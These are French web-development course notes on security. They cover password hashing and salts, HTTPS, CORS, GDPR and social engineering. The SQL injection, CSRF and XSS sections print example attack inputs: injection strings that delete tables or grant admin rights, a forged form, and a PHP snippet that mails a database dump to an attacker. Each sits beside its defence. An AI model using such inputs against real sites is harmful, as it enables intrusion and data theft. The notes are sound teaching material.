
<!DOCTYPE html>

<html lang="fr">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />

    <title>Sécurité &#8212; Documentation Cours Greta DWWM93 2021 1.0</title>
    <link rel="stylesheet" type="text/css" href="../_static/pygments.css" />
    <link rel="stylesheet" type="text/css" href="../_static/alabaster.css" />
    <script data-url_root="../" id="documentation_options" src="../_static/documentation_options.js"></script>
    <script src="../_static/jquery.js"></script>
    <script src="../_static/underscore.js"></script>
    <script src="../_static/doctools.js"></script>
    <script src="../_static/translations.js"></script>
    <link rel="index" title="Index" href="../genindex.html" />
    <link rel="search" title="Recherche" href="../search.html" />
   
  <link rel="stylesheet" href="../_static/custom.css" type="text/css" />
  
  
  <meta name="viewport" content="width=device-width, initial-scale=0.9, maximum-scale=0.9" />

  </head><body>
  

    <div class="document">
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  <section id="securite">
<h1>Sécurité<a class="headerlink" href="#securite" title="Lien permanent vers ce titre">¶</a></h1>
<p>Mega important</p>
<section id="vos-idees">
<h2>Vos idées ?<a class="headerlink" href="#vos-idees" title="Lien permanent vers ce titre">¶</a></h2>
<ol class="simple">
<li><p>mdp hashés</p></li>
<li><p>https</p></li>
<li><p>controle input form (front ET BACK)</p></li>
<li><p>injection SQL =&gt; prepare requete</p></li>
<li><p>CSRF</p></li>
<li><p>DDOS</p></li>
<li><p>POST vs GET</p></li>
<li><p>protection des fichiers uploadés</p></li>
<li><p>fishing</p></li>
<li><p>brute force (recatcha, latence connexion..)</p></li>
<li><p>2FA</p></li>
<li><p>IP / DNS</p></li>
<li><p>serveur web acces limités sources</p></li>
<li><p>sécurité par l”obscurité / obsfucation</p></li>
<li><p>supply chain</p></li>
<li><p><a class="reference external" href="https://fr.wikipedia.org/wiki/Air_gap">air gap</a> (mais attaquable avec des backchannels, comme les ondes électromagnétiques de l”écran etc.)</p></li>
<li><p>cheval de troie</p></li>
<li><p>virus / ransomware / zombie</p></li>
<li><p>chiffrement</p></li>
<li><p>man in the middle</p></li>
<li><p>xss</p></li>
<li><p>social engineering</p></li>
<li><p>clickjacking</p></li>
<li><p>faux reseau wifi</p></li>
<li><p>mot de passe compliqué</p></li>
<li><p>RGPD</p></li>
<li><p>.env / constantes config pour ne pas commiter d”infos secrètes</p></li>
</ol>
</section>
<section id="en-bref">
<h2>En bref<a class="headerlink" href="#en-bref" title="Lien permanent vers ce titre">¶</a></h2>
<p>La sécurité absolue n”existe pas.</p>
<p>C”est toujours une question de difficulté vs prix / temps.</p>
</section>
<section id="chiffrement-hashage">
<h2>Chiffrement / hashage<a class="headerlink" href="#chiffrement-hashage" title="Lien permanent vers ce titre">¶</a></h2>
<section id="cryptage-decryptage-codage-decodage">
<h3>Cryptage / décryptage / codage / décodage<a class="headerlink" href="#cryptage-decryptage-codage-decodage" title="Lien permanent vers ce titre">¶</a></h3>
<p>Illisible.</p>
</section>
<section id="chiffrement">
<h3>Chiffrement<a class="headerlink" href="#chiffrement" title="Lien permanent vers ce titre">¶</a></h3>
<p>Partager un secret pour que les seules personnes qui connaissent le secret puissent lire le message.</p>
<blockquote>
<div><p>important : « Reversibilité » : je peux chiffrer et déchiffrer</p>
</div></blockquote>
<p>exemples : A-vaut-K, RSA, ECDSA, ED25519 …</p>
<p>RSA, ECDSA, ED25519 etc. sont des chiffrements <strong>asymétriques</strong> : avec une clé publique et une clé privée. (cf connexion à github : <code class="docutils literal notranslate"><span class="pre">ssh-keygen</span></code> pour éviter de taper son login mdp à chaque fois)</p>
</section>
<section id="hachage-hash-in-english">
<h3>Hachage (hash in english)<a class="headerlink" href="#hachage-hash-in-english" title="Lien permanent vers ce titre">¶</a></h3>
<p>Notamment les mots de passe.</p>
<p>C”est quoi ?</p>
<blockquote>
<div><p>Rend illisible le même message de la même manière, <strong>sans réversibilité</strong>.</p>
</div></blockquote>
<p>Hachage , mais pas « déhachage » (penser au steak).</p>
<p>Pour les BDD de mots de passe, si j”utilisais du chiffrement, la récupération de la clé secrète permettrait d”avoir accès à la liste de tous les mots de passe en clair.</p>
<section id="attaque-contre-la-base-hachee">
<h4>Attaque contre la base hachée<a class="headerlink" href="#attaque-contre-la-base-hachee" title="Lien permanent vers ce titre">¶</a></h4>
<p><strong>Brute force:</strong> je calcule un tableau de correspondance entre tous les mots qui existent et les hash.</p>
<p>ex: azerty =&gt; ozhfloihdsfhfdvhvgfd</p>
<p>On a eu qques années de protection, mais aujourd”hui on peut trouver des tableaux pré-calculés de hashs de mdp !</p>
</section>
<section id="protection-du-moment-le-salt-le-grain-de-sel">
<h4>Protection du moment : le Salt (le grain de sel)<a class="headerlink" href="#protection-du-moment-le-salt-le-grain-de-sel" title="Lien permanent vers ce titre">¶</a></h4>
<p>Le but : augmenter artificiellement la taille du mdp pour lutter contre l”augmentation de la puissance de calcul des hackers.</p>
<ol class="simple">
<li><p>inscription :</p></li>
</ol>
<ul class="simple">
<li><p>user =&gt; « toto » (4 caractères, bof)</p></li>
<li><p>app =&gt; <code class="docutils literal notranslate"><span class="pre">concat(&quot;toto&quot;</span> <span class="pre">,</span> <span class="pre">256</span> <span class="pre">caractères</span> <span class="pre">au</span> <span class="pre">pif</span> <span class="pre">(salt))</span></code></p></li>
<li><p>app =&gt; hash ce mdp (de 260 caractères)</p></li>
</ul>
<ol class="simple">
<li><p>connexion :</p></li>
</ol>
<ul class="simple">
<li><p>user =&gt; « toto »</p></li>
<li><p>app =&gt; <code class="docutils literal notranslate"><span class="pre">concat(&quot;toto&quot;</span> <span class="pre">,</span> <span class="pre">avec</span> <span class="pre">les</span> <span class="pre">mêmes</span> <span class="pre">256</span> <span class="pre">caractères</span> <span class="pre">(stockés</span> <span class="pre">en</span> <span class="pre">clair</span> <span class="pre">dans</span> <span class="pre">ma</span> <span class="pre">bdd))</span></code></p></li>
<li><p>app =&gt; password verify</p></li>
</ul>
<p>Je suis protégé tant que les attaquants n”ont pas le tableau des mdp &gt;= 260 caractères.</p>
<p>Pour éviter qu”un attaquant calcule le tableau (qui n”existe pas encore) uniquement pour mon salt =&gt; ce qui revient à calculer le tableau pour les 8 caractères classiques ! donc c”est pas très long.</p>
<p>=&gt; astuce : un salt différent par utilisateur !</p>
<p>cf <a class="reference external" href="https://stringfixer.com/fr/Bcrypt">fonctionnement de bcrypt</a>:</p>
<p>Une chaîne de hachage bcrypt est de la forme :</p>
<p><code class="docutils literal notranslate"><span class="pre">$2&lt;a/b/x/y&gt;$[cost]$[22</span> <span class="pre">caractères</span> <span class="pre">de</span> <span class="pre">sel][31</span> <span class="pre">caractères</span> <span class="pre">de</span> <span class="pre">hachage]</span></code></p>
<p>Par exemple:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span>$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
\__/\/ \___________________/\_____________________________/ Alg Cost Salt Hash
</pre></div>
</div>
<p>Où:</p>
<ul class="simple">
<li><p>$2a$: L”identifiant de l”algorithme de hachage (bcrypt)</p></li>
<li><p>10: Facteur de coût (2^10 ==&gt; 1 024 tours)</p></li>
<li><p>N9qo8uLOickgx2ZMRZoMye: sel 16 octets (128 bits), Radix-64 encodé en 22 caractères</p></li>
<li><p>IjZAgcfl7p92ldGxad68LJZdL17lhWy : hachage de 24 octets (192 bits), Radix-64 encodé en 31 caractères</p></li>
</ul>
</section>
</section>
<section id="https-ssl">
<h3>https (ssl)<a class="headerlink" href="#https-ssl" title="Lien permanent vers ce titre">¶</a></h3>
<p>HTTP : protocole de communication entre machines sur internet.</p>
<blockquote>
<div><p>Analogie (un peu bancale) : http = description de comment envoyer un courrier à un destinataire (càd: enveloppe + adresse + timbre + exp …)</p>
</div></blockquote>
<p>=&gt; est-ce que mon courier est protégé ? NON ! on peut ouvrir la lettre et la lire !</p>
<p>idem pour http : si je fais <code class="docutils literal notranslate"><span class="pre">POST</span> <span class="pre">mabanqueprivee.com</span> <span class="pre">{identifiant:</span> <span class="pre">&quot;pierre99&quot;,</span> <span class="pre">mdp:</span> <span class="pre">&quot;j'adore</span> <span class="pre">le</span> <span class="pre">code&quot;}</span></code> alors n”importe quel équipement réseau qui peut lire les échanges HTTP peut lire votre login/mdp.</p>
<blockquote>
<div><p>l”idée du https est de chiffrer le contenu de ta requete http ! comme si tu mettais dans ton enveloppe un message codé.</p>
</div></blockquote>
<section id="cle-publique-cle-privee">
<h4>Clé publique / clé privée<a class="headerlink" href="#cle-publique-cle-privee" title="Lien permanent vers ce titre">¶</a></h4>
<p>C”est une paire de secrets, ça s”appelle du <strong>chiffrement asymétrique</strong> !</p>
<p>Grâce à des calculs mathématiques, je peux :</p>
<ul class="simple">
<li><p>chiffrer un message avec ma clé privée : seuls ceux qui ont la clé publique peuvent le déchiffrer (donc tout le monde) =&gt; ça prouve mon identité</p></li>
<li><p>chiffrer un message avec ma clé publique : seuls ceux qui ont ma clé privée (moi) peuvent déchiffrer le message =&gt; confidentialité</p></li>
</ul>
<p>=&gt; tout repose sur la sécurité de la clé privée ! ne doit pas être accessible !</p>
</section>
<section id="demarche">
<h4>Démarche<a class="headerlink" href="#demarche" title="Lien permanent vers ce titre">¶</a></h4>
<ol class="simple">
<li><p>le site me passe sa clé publique</p></li>
<li><p>je demande à l”autorité de certification si la clé publique est bonne</p></li>
<li><p>j”utilise sa clé pour chiffrer ma demande (et lui envoyer ma clé publique en meme temps)</p></li>
<li><p>je lui envoie (et personne ne peut la lire)</p></li>
<li><p>le site déchiffre ma demande etc. et me répond en chiffrant avec ma clé publique + sa clé privée !</p></li>
</ol>
<p>NB: pour vous : soit acheter un « certificat » à votre hébergeur (ovh, gandi…), soit utiliser letsencrypt.org qui fournit des certificats gratuits.</p>
</section>
</section>
</section>
<section id="injection-sql">
<h2>Injection SQL<a class="headerlink" href="#injection-sql" title="Lien permanent vers ce titre">¶</a></h2>
<p>Réussir à faire exécuter du SQL par le site ciblé (victime).</p>
<ul class="simple">
<li><p>je peux mettre ma requete SQL pirate dans l”url</p></li>
<li><p>ou dans un formulaire</p></li>
<li><p>…</p></li>
</ul>
<p>ex: formulaire de connexion</p>
<ul class="simple">
<li><p>login : “ »toto » OR 1=1 ;”</p></li>
<li><p>password : « mdp »</p></li>
</ul>
<p>=&gt; que se passe-t-il dans mon back ?</p>
<div class="highlight-sql notranslate"><div class="highlight"><pre><span></span>SELECT *
FROM user
WHERE login = $login
AND password = $password
</pre></div>
</div>
<p>Le problème vient du fait que je prends la chaîne de l”utilisateur telle quelle dans ma requête SQL !</p>
<p>Autres exemples :</p>
<ul class="simple">
<li><p><code class="docutils literal notranslate"><span class="pre">login:</span> <span class="pre">&quot;&quot;;DELETE</span> <span class="pre">*</span> <span class="pre">FROM</span> <span class="pre">user;</span></code></p></li>
<li><p><code class="docutils literal notranslate"><span class="pre">login:</span> <span class="pre">&quot;&quot;;DROP</span> <span class="pre">DATABASE;</span></code></p></li>
<li><p><code class="docutils literal notranslate"><span class="pre">login:</span> <span class="pre">&quot;&quot;;UPDATE</span> <span class="pre">user</span> <span class="pre">SET</span> <span class="pre">admin=1</span> <span class="pre">WHERE</span> <span class="pre">login=mon_login;</span></code></p></li>
</ul>
<section id="comment-on-se-protege">
<h3>Comment on se protège ?<a class="headerlink" href="#comment-on-se-protege" title="Lien permanent vers ce titre">¶</a></h3>
<p>=&gt; <strong>requêtes préparées</strong></p>
<div class="highlight-sql notranslate"><div class="highlight"><pre><span></span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="k">FROM</span><span class="w"> </span><span class="k">user</span><span class="w"></span>
<span class="k">WHERE</span><span class="w"> </span><span class="n">login</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">:</span><span class="n">login</span><span class="w"></span>
<span class="k">AND</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">:</span><span class="n">password</span><span class="w"></span>
</pre></div>
</div>
<p>Dans un premier temps, le SGBD écrit la requête correcte ! Puis il met dedans les variables <strong>qui ne peuvent plus influencer la requête</strong>. Donc il va chercher un login qui vaut “ » »;DROP DATABASE” au lieu de réécrire la requête.</p>
<section id="sans-prepare">
<h4>Sans prepare<a class="headerlink" href="#sans-prepare" title="Lien permanent vers ce titre">¶</a></h4>
<ol class="simple">
<li><p>j”écris mes chaînes de caractères SQL avec PHP</p></li>
<li><p>je crée les requêtes associées en SQL</p></li>
</ol>
</section>
<section id="avec-prepare">
<h4>Avec prepare<a class="headerlink" href="#avec-prepare" title="Lien permanent vers ce titre">¶</a></h4>
<ol class="simple">
<li><p>je crée la requête valide en SQL</p></li>
<li><p>le SGBDR attend la donnée à comparer (la requête ne peut plus être modifiée à ce stade)</p></li>
</ol>
</section>
</section>
</section>
<section id="csrf-cross-site-request-forgery-ou-xsrf">
<h2>CSRF : Cross Site Request Forgery (ou XSRF)<a class="headerlink" href="#csrf-cross-site-request-forgery-ou-xsrf" title="Lien permanent vers ce titre">¶</a></h2>
<p>Un attaquant profite du fait que vous êtes loggé sur un site lambda, pour vous faire valider sur un site tiers un formulaire qui pointe vers le site lambda.</p>
<section id="exemple">
<h3>Exemple<a class="headerlink" href="#exemple" title="Lien permanent vers ce titre">¶</a></h3>
<ol class="simple">
<li><p>je suis loggé sur candidatures de diallo</p></li>
<li><p>je vais sur petithackermalin.com dans un autre onglet</p></li>
<li><p>sur « phm.com » il y a un formulaire bidon que je vais valider (il te promet un iphone 40 gratos)</p></li>
<li><p>le form en question : <code class="docutils literal notranslate"><span class="pre">&lt;form</span> <span class="pre">action=&quot;candidatures.com/user/petithacker&quot;&gt;&lt;input</span> <span class="pre">name=&quot;admin&quot;</span> <span class="pre">value=&quot;1&quot;/&gt;&lt;/form&gt;</span></code> (et non pas un envoi d”iphone XXX)</p></li>
<li><p>petithacker est maintenant admin sur le site de diallo, si l”utilisateur connecté en 1 avait les droits d”effectuer le POST du form.</p></li>
</ol>
</section>
<section id="comment-se-proteger">
<h3>Comment se protéger ?<a class="headerlink" href="#comment-se-proteger" title="Lien permanent vers ce titre">¶</a></h3>
<p>Je dois m”assurer que le formulaire vient bien de chez moi !</p>
<p>=&gt; j”ajoute un champ caché <strong>aléatoire</strong> !! genre un token (hash ou autre) et il faut le stocker en session pour comparer le token reçu et le token généré dans le formulaire (stocké donc).</p>
<p>=&gt; <code class="docutils literal notranslate"><span class="pre">token</span> <span class="pre">csrf</span></code></p>
</section>
</section>
<section id="xss-cross-site-scripting">
<h2>XSS : Cross Site Scripting<a class="headerlink" href="#xss-cross-site-scripting" title="Lien permanent vers ce titre">¶</a></h2>
<p>! nom un peu trop vague.</p>
<section id="principe">
<h3>Principe<a class="headerlink" href="#principe" title="Lien permanent vers ce titre">¶</a></h3>
<p>Je crée un script (php, js, etc.) et je parviens à le faire exécuter par l”utilisateur que j”attaque.</p>
</section>
<section id="exemple-bien-standard">
<h3>Exemple bien standard<a class="headerlink" href="#exemple-bien-standard" title="Lien permanent vers ce titre">¶</a></h3>
<p>Je poste un commentaire dans un formulaire d”un forum :</p>
<div class="highlight-js notranslate"><div class="highlight"><pre><span></span><span class="nx">alert</span><span class="p">(</span><span class="s2">&quot;you have been pwnd&quot;</span><span class="p">);</span><span class="w"></span>
</pre></div>
</div>
<p>L”utilisateur qui verra mon commentaire va déclencher l”alert !</p>
<p>ou</p>
<div class="highlight-php notranslate"><div class="highlight"><pre><span></span><span class="cp">&lt;?php</span>
  <span class="nv">$bdd</span> <span class="o">=</span> <span class="nx">BDD</span><span class="o">::</span><span class="na">connexion</span><span class="p">();</span>
  <span class="k">new</span> <span class="nx">PHPMailer</span><span class="p">()</span><span class="o">-&gt;</span><span class="na">send</span><span class="p">(</span><span class="s2">&quot;petithackermalin&quot;</span><span class="p">,</span><span class="nv">$bdd</span><span class="o">-&gt;</span><span class="na">dumpDatabase</span><span class="p">());</span>
<span class="cp">?&gt;</span><span class="x"></span>
</pre></div>
</div>
<p>ou j”ai uploadé un fichier php <code class="docutils literal notranslate"><span class="pre">image.png</span></code> et le php s”exécute quand j”affiche ma photo de profil…</p>
</section>
<section id="comment-je-me-protege">
<h3>Comment je me protège ?<a class="headerlink" href="#comment-je-me-protege" title="Lien permanent vers ce titre">¶</a></h3>
<blockquote>
<div><p>En codant correctement !</p>
</div></blockquote>
<ul class="simple">
<li><p>empêcher les caractères spéciaux dans les champs texte (escape special chars…)</p></li>
<li><p>en vérifiant le mime/type et extension des fichiers uploadés et en les renommant pour éviter leur exécution éventuelle</p></li>
</ul>
</section>
</section>
<section id="cors-cross-origin-resource-sharing">
<h2>CORS : Cross Origin Resource Sharing<a class="headerlink" href="#cors-cross-origin-resource-sharing" title="Lien permanent vers ce titre">¶</a></h2>
<blockquote>
<div><p>! c”est une protection intégrée au navigateur, pas au serveur !</p>
</div></blockquote>
<p>Empêcher (ou autoriser) l”accès à certaines ressources par le navigateur.</p>
<section id="par-exemple">
<h3>Par exemple<a class="headerlink" href="#par-exemple" title="Lien permanent vers ce titre">¶</a></h3>
<p>Je veux que les requêtes vers « api.tourismeform.com » ne proviennent que du site « tourismeform.com ».</p>
<p>Cela évite que quelqu”un essaie de récupérer des informations depuis un autre site. (genre si je suis sur <code class="docutils literal notranslate"><span class="pre">hackervaillant.com</span></code>)</p>
<blockquote>
<div><p>! cela ne marchera que si l”utilisateur utilise un navigateur récent. (si vous passez par curl, postman ou ie6 ce sera toujours possible)</p>
</div></blockquote>
</section>
<section id="nota-bene">
<h3>Nota Bene<a class="headerlink" href="#nota-bene" title="Lien permanent vers ce titre">¶</a></h3>
<p>C”est <code class="docutils literal notranslate"><span class="pre">api.tourismeform.com</span></code> qui indique au navigateur qui a le droit d”accéder à ses pages, et c”est le <em>navigateur</em> qui fait la vérification.</p>
<p>C”est à vous, <em>développeur</em>, de bien paramétrer votre back pour autoriser les bons domaines à vous requêter.</p>
</section>
</section>
<section id="rgpd-reglement-general-sur-la-protection-des-donnees-gdpr">
<h2>RGPD : Règlement Général sur la Protection des Données (GDPR)<a class="headerlink" href="#rgpd-reglement-general-sur-la-protection-des-donnees-gdpr" title="Lien permanent vers ce titre">¶</a></h2>
<blockquote>
<div><p>C”est le truc qui va vous envoyer en prison (https://www.legalplace.fr/guides/rgpd-sanction/) si vous faites pas votre taf correctement.</p>
</div></blockquote>
<p>Fiche de la CNIL <a class="reference external" href="https://www.cnil.fr/fr/rgpd-de-quoi-parle-t-on">ici</a>.</p>
<section id="qui-est-concerne">
<h3>Qui est concerné ?<a class="headerlink" href="#qui-est-concerne" title="Lien permanent vers ce titre">¶</a></h3>
<blockquote>
<div><p>Le RGPD s’applique à toute organisation, publique et privée, qui traite des données personnelles pour son compte ou non, dès lors :</p>
<ul class="simple">
<li><p>qu”elle est établie sur le territoire de l’Union européenne,</p></li>
<li><p>ou que son activité cible directement des résidents européens.</p></li>
</ul>
</div></blockquote>
</section>
<section id="regles-a-suivre">
<h3>Règles à suivre<a class="headerlink" href="#regles-a-suivre" title="Lien permanent vers ce titre">¶</a></h3>
<p>Règles à suivre pour la gestion des données de vos utilisateurs.</p>
<ul class="simple">
<li><p>hacher les mdp</p></li>
<li><p>ne stocker <strong>que</strong> les données nécessaires au bon fonctionnement du site <strong>et</strong> pouvoir le prouver</p></li>
<li><p>ne stocker aucune donnée « illégale » : orientation sexuelle, religion, information médicale etc. =&gt; nécessite une dérogation de la <strong>CNIL</strong> (Commission Nationale Informatique et Liberté)</p></li>
<li><p>recueillir le consentement explicite et éclairé de l”utilisateur pour le traitement de ses données (pas de <code class="docutils literal notranslate"><span class="pre">opt-out</span></code> mais du <code class="docutils literal notranslate"><span class="pre">opt-in</span></code>) (cf: les cookies sur les sites)</p></li>
<li><p>expliciter et publier les traitements de données</p></li>
<li><p>il faut un responsable identifié pour la gestion des données, indépendant !</p></li>
<li><p>portabilité des données : l”utilisateur peut demander la suppression de toutes ses données (exception: https://www.cnil.fr/fr/le-droit-leffacement-supprimer-vos-donnees-en-ligne, si obligations légales ou autres bonnes raisons), et l”export de toutes ses données pour les migrer vers un autre système (éventuellement)</p></li>
<li><p>répondre &lt; 1 mois, ou 8j si donnée de santé</p></li>
<li><p>valable aussi si vous êtes sous-traitant</p></li>
<li><p>attention aux accès aux données par vos salariés : ne doit avoir accès que si besoin</p></li>
<li><p>attention aux données <em>de vos salariés</em></p></li>
<li><p>obligation de prévenir la cnil et les utilisateurs en cas de fuite de données</p></li>
</ul>
<p>https://www.cnil.fr/sites/default/files/atoms/files/bpi-cnil-rgpd_guide-tpe-pme.pdf</p>
<p>cf campagne de pub de signal https://signal.org/blog/the-instagram-ads-you-will-never-see/ : on sait qui vous êtes même si vous bloquez la pub.</p>
</section>
<section id="en-cas-d-infraction">
<h3>En cas d”infraction<a class="headerlink" href="#en-cas-d-infraction" title="Lien permanent vers ce titre">¶</a></h3>
<ul class="simple">
<li><p>jusqu”à 4% (ou 20 millions €) du Chiffre d”Affaire mondial de l”entreprise (sachant que la marge des entreprises est en moyenne 30%, ça fait 1/6 minimum des bénéfices)</p></li>
<li><p><a class="reference external" href="https://www.legalplace.fr/guides/rgpd-sanction/">prison and co</a></p></li>
</ul>
</section>
</section>
<section id="social-engineering">
<h2>Social Engineering<a class="headerlink" href="#social-engineering" title="Lien permanent vers ce titre">¶</a></h2>
<p>LE truc le plus utilisé pour le piratage !!</p>
<blockquote>
<div><p>=&gt; Faire très attention à qui on fait confiance.</p>
</div></blockquote>
<p>Il s”agit de faire grandir la confiance que les gens vous font, petit à petit.</p>
<p>ex: assistante du pdg qui fait des virements en pensant que le pdg a demandé. (<a class="reference external" href="https://www.cybermalveillance.gouv.fr/tous-nos-contenus/fiches-reflexes/escroquerie-faux-ordres-virement-fovi">FOVI</a>)</p>
<p>ex: <a class="reference external" href="https://www.youtube.com/watch?v=OkBaZLq7gnU">Oceans 8</a></p>
<section id="phishing">
<h3>Phishing<a class="headerlink" href="#phishing" title="Lien permanent vers ce titre">¶</a></h3>
<p>!!</p>
</section>
</section>
</section>


          </div>
          
        </div>
      </div>
      <div class="sphinxsidebar" role="navigation" aria-label="main navigation">
        <div class="sphinxsidebarwrapper">
<h1 class="logo"><a href="../index.html">Cours Greta DWWM93 2021</a></h1>








<h3>Navigation</h3>
<p class="caption" role="heading"><span class="caption-text">Contents:</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../cours.html">Lundi 2021-10-18</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-10-19">Mardi 2021-10-19</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2021-10-25">Lundi 2021-10-25</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-11-02">Mardi 2021-11-02</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-11-09">Mardi 2021-11-09</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-11-16">Mardi 2021-11-16</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mercredi-2021-11-17">Mercredi 2021-11-17</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-11-23">Mardi 2021/11/23</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mercredi-2021-11-24">Mercredi 2021/11/24</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-11-30">Mardi 2021-11-30</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mercredi-2021-12-08">Mercredi 2021-12-08</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#jeudi-2021-12-09">Jeudi 2021-12-09</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2021-12-14">Mardi 2021-12-14</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2021-12-20">Lundi 2021/12/20</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2022-01-03">Lundi 2022/01/03</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-01-04">Mardi 2022/01/04</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2022-01-10">Lundi 2022/01/10</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-01-11">Mardi 2022/01/11</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mercredi-2022-01-12">Mercredi 2022/01/12</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2022-01-17">Lundi 2022/01/17</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-01-18">Mardi 2022/01/18</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-01-25">Mardi 2022/01/25</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#vendredi-2022-01-28">Vendredi 2022/01/28</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2022-01-31">Lundi 2022/01/31</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-02-01">Mardi 2022/02/01</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2022-02-07">Lundi 2022/02/07</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-02-08">Mardi 2022/02/08</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#lundi-2022-02-14">Lundi 2022/02/14</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mardi-2022-02-15">Mardi 2022/02/15</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#afficher-la-premiere-vue-gracea-this-render">Afficher la premiere vue grâceà $this-&gt;render !</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#librairie-vs-framework">Librairie vs Framework</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#mvc">MVC</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#twig">TWIG</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#la-base-de-donnees">La base de données</a></li>
<li class="toctree-l1"><a class="reference internal" href="../cours.html#securite">Sécurité</a></li>
</ul>

<div class="relations">
<h3>Related Topics</h3>
<ul>
  <li><a href="../index.html">Documentation overview</a><ul>
  </ul></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Recherche rapide</h3>
    <div class="searchformwrapper">
    <form class="search" action="../search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</div>
<script>$('#searchbox').show(0);</script>








        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div class="footer">
      &copy;2021, Esat + Marc.
      
      |
      Powered by <a href="http://sphinx-doc.org/">Sphinx 4.5.0</a>
      &amp; <a href="https://github.com/bitprophet/alabaster">Alabaster 0.7.12</a>
      
      |
      <a href="../_sources/cours/2022-05-18_securité.md.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>